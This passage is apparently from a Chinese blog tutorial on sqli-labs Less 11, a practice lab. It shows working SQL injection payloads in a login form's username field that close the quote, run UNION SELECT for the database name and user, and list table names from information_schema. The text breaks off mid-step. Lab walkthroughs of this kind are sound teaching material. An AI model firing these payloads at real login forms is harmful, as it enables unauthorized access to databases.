sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解：联合注入、错误注入

超栈

已于 2024-06-09 21:41:26 修改

阅读量870

点赞数 4

CC 4.0 BY-SA版权

分类专栏：蓝桥网安日志文章标签： sql web安全安全前端数据库计算机网络网络安全

于 2024-06-09 21:40:11 首次发布

本文链接：https://blog.youkuaiyun.com/Superstacks/article/details/139566637

SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它，我们可以学习如何识别和利用不同类型的SQL注入漏洞，并了解如何修复和防范这些漏洞。

Less 11

SQLI DUMB SERIES-11

welcome dhakkan

尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号：
login attempt
同时输入正确的用户名就可以查看到数据，那么我们就只可以在这个uname位置直接注入。

uname=admin' -- &passwd=1

在这里插入图片描述

获取数前数据库的数据名和用户名

uname=0' union select database(),user() from dual -- &passwd=1

logged in
获取当前数据库的表名：

uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1

successfully logged in
获取user表的列名：

uname

200万优质内容无限畅学